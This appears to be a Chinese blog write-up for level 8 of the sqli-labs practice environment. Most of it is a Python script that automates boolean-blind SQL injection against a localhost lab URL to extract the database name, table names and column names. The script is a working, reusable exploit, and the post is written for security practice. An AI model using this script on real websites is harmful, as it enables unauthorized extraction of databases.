sqli-labs第8关
布尔盲注 python代码
:
参考了这篇博客:
跳转博客
笔者对其提供的代码进行了代码重写和优化,如下:
# the burp_schema.py is for 布尔盲注的爆破
import requests
url = "http://localhost/sqli-labs-master/Less-8" # 替换成实际的url
keylist=[chr(i) for i in range(33, 65)]
keylist+=[chr(i) for i in range(91, 127)] # keylist不包含大写字母,防止获取的name出现大小写重叠的情况
flag = 'You are in' # 替换成成功返回页面的标识
class Base():
def __init__(self, min, max, payload1, payload2, len=0):
self.min = min
self.max = max
self.payload1 = payload1
self.payload2 = payload2 # 这个payload2用于获取name
self.len = len # 存储name的长度
def get_length(self):
l = self.min
r = self.max
while l <= r: # 二分法求长度
mid = (r + l) // 2
payload1 = self.payload1 + str(mid) + "-- ss"
param = {
"id":payload1,
}
response = requests.get(url, params=param)
# print(param)
if response.text.find(flag) != -1:
l = mid + 1
else:
r = mid - 1
mid += 1
print("len: " + str(mid), end='\n')
self.len = mid # 设置类的长度
def get_name(self):
db = ''
for i in range(1, self.len + 1):
for c in keylist:
payload2 = self.payload2 + str(i) + ",1 )= '" + c + "'-- ss"
param = {
"id": payload2,
}
response = requests.get(url, params=param)
if response.text.find(flag) != -1:
db = db + c
print("name: " + str(db), end='\n')
def GetCurrentDatabase():
payload1 = "1' and (length(database()))>"
payload2 = "1' and substring(database(),"
database = Base(0, 10, payload1, payload2)
database.get_length()
database.get_name()
def GetTables():
payload1 = "1' and (length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>"
payload2 = "1' and substr((select group_concat(table_name) from information_schema.tables where table_schema = database()),"
table = Base(0, 100, payload1, payload2)
len = table.get_length()
table.get_name()
def GetColumns(table):
payload1 = "1' and (length((select group_concat(column_name) from information_schema.columns where table_name = '" + table + "' and table_schema=database())))>"
payload2 = "1' and substr((select group_concat(column_name) from information_schema.columns where table_name = '" + table + "' and table_schema=database()),"
columns = Base(0, 100, payload1, payload2)
columns.get_length()
columns.get_name()
GetCurrentDatabase()
GetTables()
#GetColumns()
重写后代码仅75行,利用率提高。
使用方法
:
python burp_schema.py
得到结果如图:
得到表名字后,修改python程序的最后一行,想得到什么表的字段,就在GetColumns()里面填入表名字。例子:
修改为:
GetColumns(users)
运行之后结果如下: